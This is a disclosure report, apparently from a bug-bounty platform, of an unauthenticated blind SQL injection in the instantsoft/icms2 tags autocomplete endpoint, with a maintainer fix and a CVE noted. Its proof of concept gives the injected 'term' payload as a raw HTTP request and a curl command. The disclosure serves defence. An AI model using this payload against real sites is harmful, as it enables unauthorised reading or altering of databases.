Unauthenticated Blind SQL Injection in '/tags/autocomplete' in instantsoft/icms2
Valid
Reported on
Aug 2nd 2023
Description
The application was found to be vulnerable to an unauthenticated blind SQL injection in the /tags/autocomplete page.
The GET parameter term does not sufficiently sanitize input.
Proof of Concept
- Make a GET request to
http://icms.local/tags/autocomplete?term=')+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))x)+AND+(1='and observe that the server responds to the time delay.
GET /tags/autocomplete?term=')+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))x)+AND+(1=' HTTP/1.1
Host: icms.local
X-Requested-With: XMLHttpRequest
- Replace hostname below where necessary
curl -i -s -k -X $'GET' \
-H $'Host: icms.local' -H $'X-Requested-With: XMLHttpRequest' \
$'http://icms.local/tags/autocomplete?term=\')+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))x)+AND+(1=\''
- As long as
X-Requested-With: XMLHttpRequestis in the HTTP request headers, an unauthenticated attacker can make the request directly to inject into the affected parameter.
Remedial Action
It is recommended to sanitize the affected parameter term.
Impact
Unauthenticated users are able to dump or alter data from the database via the affected page and parameter.
Occurrences
We are processing your report and will contact the
instantsoft/icms2
team within 24 hours.
4 months ago
We have contacted a member of the
instantsoft/icms2
team and are waiting to hear back
4 months ago
Fixed https://github.com/instantsoft/icms2/commit/1dbc3e6c8fbf5d2dc551cb27fad0de3584dee40f
A instantsoft/icms2 maintainer
modified the Severity from
Critical (9.8) to
Critical (9.8)
4 months ago
The researcher's credibility has increased: +7
The fix bounty has been dropped
This vulnerability has been assigned a CVE
autocomplete.php#L21
has been validated
Thank you!
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
If I've done something wrong in this topic, please post. First time here.
to join this conversation